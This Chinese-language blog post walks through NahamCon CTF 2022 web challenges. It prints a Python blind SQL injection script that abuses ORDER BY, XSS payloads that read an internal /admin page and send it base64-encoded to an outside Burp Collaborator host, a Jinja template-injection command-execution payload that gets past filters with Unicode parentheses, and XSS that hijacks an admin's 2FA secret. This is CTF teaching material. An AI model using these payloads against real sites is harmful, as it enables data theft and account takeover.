NahamCon CTF 2022

已于 2022-05-04 09:27:21 修改
阅读量870 收藏
点赞数
分类专栏: 比赛复现 文章标签: NahamCon CTF
于 2022-05-03 09:42:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124538514
版权

目录

Flask Metal Alchemist

没有回显,没有报错,只有金属元素的排序,那么我们是否可以通过判断金属元素的排序是否正确来进行布尔盲注。

从app.py中可以看出有两个功能,search和order,且它只过滤了金属名字,并没有过滤order名字。

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        search = ""
        order = None
        if "search" in request.form:
            search = request.form["search"]
        if "order" in request.form:
            order = request.form["order"]
        if order is None:
            metals = Metal.query.filter(Metal.name.like("%{}%".format(search)))
        else:
            metals = Metal.query.filter(
                Metal.name.like("%{}%".format(search))
            ).order_by(text(order))
        return render_template("home.html", metals=metals)
    else:
        metals = Metal.query.all()
        return render_template("home.html", metals=metals)

database.py,正在使用sqlite数据库。

from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base

engine = create_engine("sqlite:tmp/test.db")
db_session = scoped_session(
    sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
Base = declarative_base()
Base.query = db_session.query_property()


def init_db():
    Base.metadata.create_all(bind=engine)

models.py中有两个,一个是metal,还有一个flag表,

from database import Base
from sqlalchemy import Column, Integer, String


class Metal(Base):
    __tablename__ = "metals"
    atomic_number = Column(Integer, primary_key=True)
    symbol = Column(String(3), unique=True, nullable=False)
    name = Column(String(40), unique=True, nullable=False)

    def __init__(self, atomic_number=None, symbol=None, name=None):
        self.atomic_number = atomic_number
        self.symbol = symbol
        self.name = name


class Flag(Base):
    __tablename__ = "flag"
    flag = Column(String(40), primary_key=True)

    def __init__(self, flag=None):
        self.flag = flag

真正要关注的是app.py中的,只对search进行了保护,但是没有对order_by保护,那么我们可以通过排列顺序来进行盲注。

metals = Metal.query.filter(
                Metal.name.like("%{}%".format(search))
            ).order_by(text(order))

from requests import post
from string import ascii_lowercase

URL = 'http://challenge.nahamcon.com:32693/'
ALPHABET = ascii_lowercase + '{}_'
INJECTION = "CASE WHEN (SELECT SUBSTR(flag,{},1) FROM flag)='{}' THEN atomic_number ELSE symbol END"
#类似于if else,如果flag匹配到,则把顺序换为原子序数.

flag = ''
index = 1
while True:
    for char in ALPHABET:
        response = post(URL, data={ 'search': '', 'order': INJECTION.format(index, char) })
        # 第一个原子符号出现在响应的索引 74 上(由换行符分割)。
        # 如果是 Li(原子序数为 3),那么我们按原子序数排序。
        first_atomic_symbol = response.text.split('\n')[74]
        if 'Li' in first_atomic_symbol:
            flag += char
            index += 1
            break
    print(flag)
    if flag[-1] == '}':
        break

在这里插入图片描述

Hacker Ts

我们输入的东西都会在衬衫上显示,那么输入一些标签呢。

例如输出如下标签,则会在衬衫上显示文本
<span>s</span>

在这里插入图片描述
且题目有个/admin页面,提示我们要以本地页面访问这个页面。
在这里插入图片描述

当输入<script>fetch("http://xxxx/xxxx")</script>,报错还告诉我们了处理的方法为wkhtmltoimage,它是专门将 HTML 呈现为 PDF/图像的工具。

在这里插入图片描述
还有一种AJAX代表“异步 JavaScript 和 XML”,是一种技术的名称,它允许网页在后台发出请求,而不会干扰当前页面的显示。在 JavaScript 中,可以使用XMLHttpRequest对象发出异步请求,并且实际上有能力处理响应文本本身。(有点像 Python 请求的处理方式)。

<div id='stuff'>a</div>
<script>
	x = new XMLHttpRequest(); 
	x.open('GET','http://localhost:5000/admin',false); 
	x.send(); 
	document.getElementById('stuff').innerHTML= x.responseText; 
</script>

在这里插入图片描述
也可以通过Burp Collaborator来获取内容

<script> 	x = new XMLHttpRequest();  	x.open('GET','http://localhost:5000/admin',false);  	x.send(); y = new XMLHttpRequest();  	y.open('GET', 'http://xjkad81ctlz6dyxen1icn1yt3k9ex3.burpcollaborator.net/request?q=' + btoa(x.responseText));  	y.send(); </script>

再base64解码一下。
在这里插入图片描述

Deafcon

当我们输入

jack
{{1+1}}@gamil.com

可以发现是模板注入。
在这里插入图片描述
在测试测试看是哪个模板,可以看到是flask模板。

jack
"{{g.pop}}"@gamil.com

在这里插入图片描述

用hackbar自带的flask-ssti链子看能不能rce

jack
"{{g.pop.__globals__.__builtins__['__import__']('os').popen('cat flag.txt').read()}}"@gamil.com

它提示在电子邮件中不能有(和),还说允许在正则表达式中验证电子邮件,
在这里插入图片描述
这边看了其他大佬的wp,学到了一种新姿势,用high-unicode绕过,且仅当 @ 左侧的部分被双引号包围时,电子邮件语法检查器才允许某些字符。

jack
"{{g.pop.__globals__.__builtins__['__import__']﹙'os'﹚.popen﹙'cat flag.txt'﹚.read﹙﹚}}"@gamil.com

在这里插入图片描述

Two For One

先注册一个账户,然后用Google Authenticator,扫二维码,这个类似于密钥,不过这个是实时刷新的。
在这里插入图片描述
使用 Burp Collaborator 确认在feedback处存在XSS 错误:

<script>
document.location="http://i4nbpco2qfhyjfasips75ju9o0uvik.burpcollaborator.net";
</script>

存在xss
在这里插入图片描述

创建新的秘密,可以看到是从id=3的位置开始的,那么flag因该就是在1号或者二号位置上。
在这里插入图片描述
那么现在就是要用管理员的otp来访问1、2号位置的秘密。
在setting位置有重置otp的功能,那么我们可以通过xss来重置管理员的otp。

且这边的2fa是需要我们自己扫码的,那么我们可以劫持令牌,发送到我们的服务器上。
在这里插入图片描述

<script>
const xhttp = new XMLHttpRequest();
xhttp.onload = function() {
  document.location="http://9oy2938ta61p36uj2gcypae08ren2c.burpcollaborator.net?otp="+this.responseText;
}
xhttp.open("POST", "http://challenge.nahamcon.com:31423/reset2fa");
xhttp.send();
</script>

可以看到一串json格式的代码,通过otpauth来生成二维码来重置。
在这里插入图片描述

qrencode 'otpauth://totp/Fort%20Knox:admin?secret=FYLRNM4LOZBXO66S' -o qr.png

用authenticator扫码登录

<script>
const xhttp = new XMLHttpRequest();
xhttp.onload = function() {
  document.location="http://9oy2938ta61p36uj2gcypae08ren2c.burpcollaborator.net?flag="+this.responseText;
}
var json = {"otp":"209405","secretId":"1"};
xhttp.open("POST", "http://challenge.nahamcon.com:31423/show_secret");
xhttp.setRequestHeader('Content-Type', 'application/json');
xhttp.send(JSON.stringify(json));
</script>

得到flag
在这里插入图片描述

参考:

wp1
wp2
wp3
wp4

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
springcloud终端生成二维码,手机端扫码登录
Meta.Qing的博客
04-03 297
添加登录页面:在你的应用程序中创建一个登录页面,并在该页面上添加一个输入框,用于输入TOTP。验证TOTP并登录:在登录页面中输入TOTP并将其发送到Spring Cloud。在Spring Cloud中生成二维码供移动端扫描登录可以使用。这样就完成了Spring Cloud中生成二维码登录的步骤。方法验证TOTP,如果验证成功,则将用户登录到应用程序。方法验证TOTP,并根据验证结果返回登录成功或失败消息。在登录页面中,我们使用。在上述代码中,我们首先创建一个。在上述代码中,我们首先创建一个。
OTP动态口令之Java实现双重认证
热门推荐
花伤情犹在的博客
02-11 1万+
双重认证(英语:Two-factor authentication,缩写为2FA),又译为双重验证、双因素认证、二元认证,又称两步骤验证(2-Step Verification,又译两步验证),是一种认证方法。
Google账户两步验证的工作原理【转】
awtqty_zhang的专栏
12-06 620
      最近在考虑一些用户登录验证的问题,现阶段在涉及到一些交易时,基本上都使用的是短信验证码验证,但有朋友说,有些时候短信验证码会出现延时,不及时。于是就看了一下Google Authenticator(coogle账户两步验证)技术。如下是从一位网友那里转来的该技术的原理描述,做个标记,方便查找。 来源:http://blog.seetee.me/archives/73.html  ...
BUUCTF 杂项——二维码
wusimin432503的博客
07-09 5644
BUUCTF 杂项——二维码
CTF 二维码[MISC]
Keepb1ue的博客
08-03 1万+
题目地址:https://buuoj.cn/challenges#%E4%BA%8C%E7%BB%B4%E7%A0%81 图片分析 下载下来一个压缩包,压缩包里只有一张二维码 试着扫描: secret is here,很明显flag就在这个压缩包里(不然在哪里…) hexdump查看分析 很明显,二维码中还隐藏着一个压缩包。里面好像存放着一个4number.txt 使用binwalk分析 文件分离: 确实隐藏了一个zip文件。 可以用-e选项自动分离,也可以用dd命令分离隐藏文件 压缩包破解: 尝
imaginary ctf 2022 writeups
08-07
imaginary ctf 2022 writeups
Imaginary CTF 2022 真题
08-01
https://2022.imaginaryctf.org/Challenges
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
otpauth, 实现 HOTP/totp的两步验证 也称为一次性密码.zip
09-18
otpauth, 实现 HOTP/totp的两步验证 也称为一次性密码 otpauth加密插件已经构建了两个因素支持。otpauth是一次口令认证,通常被称为两个步骤验证。 你可能已经从谷歌,Dropbox等听过了。 安装使用 pip 安装otpauth很简单:$ pi
decrypt-otpauth-files:解密由OTP Auth创建的文件
05-01
解密otpauth文件 此工具允许解密由创建的加密备份/帐户文件。 如果发现文件格式有问题(特别是与安全性相关的问题),请不要犹豫并提出问题。 要求 加密的OTP Auth备份/帐户文件 用法 克隆存储库 git clone https://github.com/CooperRS/decrypt-otpauth-files.git cd decrypt-otpauth-files 安装依赖项 pipenv install 解密您的OTP身份验证文件 # Decrypt a full backup file pipenv run python decrypt_otpauth.py decrypt_backup --encrypted-otpauth-backup <path> # Decrypt a single account export
TOTP算法实现二步验证
weixin_33785108的博客
06-24 2236
概念 TOTP算法(Time-based One-time Password algorithm)是一种从共享密钥和当前时间计算一次性密码的算法。 它已被采纳为Internet工程任务组标准RFC 6238,是Initiative for Open Authentication(OATH)的基石,并被用于许多双因素身份验证系统。 TOTP是基于散列的消息认证码(HMAC)的示例。 它使用加密哈希函...
java TOTP 验证码 hmcsha1算法实现
月夜流心的博客
07-15 366
import java.nio.ByteBuffer; import javax.crypto.Mac; import javax.crypto.spec.SecretKeySpec; import org.apache.commons.codec.binary.Base32; public class TotpUtils { /** 时间步长,动态口令变化时间周期(单位秒) */ private static final int TIME_STEP = 30; /** 动态口
谷歌身份验证器二维码
yimcarson的博客
07-24 8568
otpauth://totp/ACCOUNT?secret=SECRET&issuer=NAME ACCOUNT账户名称 SECRET密钥 NAME发布者、公司、网站的名称 e.g. otpauth://totp/yimcarson?secret=VIABPOEXKBBMLZD2&issuer=CSDN
python google auth totp_Google Authenticator TOTP原理详解(以Python为例)
weixin_39663360的博客
12-09 345
如果有疑问,请点击此处,然后发表评论交流,作者会及时回复(也可以直接在当前文章评论)。-------谢谢您的参考,如有疑问,欢迎交流一、 原理详解(图片可以点击然后放大查看)二、 验证1、下载Google谷歌身份验证器。2、通过Python 的qrcode和pyotp模块生成二维码。3、然后使用下载的谷歌身份验证器扫描生成的二维码如果没有谷歌服务,则选择输入秘钥,在账户明处填入name参数,在秘...
Java实现TOTP动态口令验证
netuser1937的博客
09-10 1769
动态口令使用场景 服务器登录动态口令验证 WEB应用密码登录二次验证 银行转账动态口令 package org.totp.commons.util; import org.apache.commons.codec.binary.Base32; import org.apache.commons.lang3.RandomStringUtils; import javax.crypto.Mac; import javax.crypto.spec.SecretKeySpec; import java.
java中的HMAC-SHA1加密
weixin_30752699的博客
01-04 403
public class Sha1Util { private static final String MAC_NAME = "HmacSHA1"; private static final String ENCODING = "UTF-8"; public static byte[] HmacSHA1Encrypt(String encrypt...
2022年工控ctf
最新发布
08-31
2022年工控CTF是一场以工业控制系统为主题的网络安全竞赛。随着工业互联网的普及和工控系统的数字化转型,工控CTF成为了信息安全领域的重要赛事之一。 在2022年工控CTF中,参赛团队将面临一系列与工控系统相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值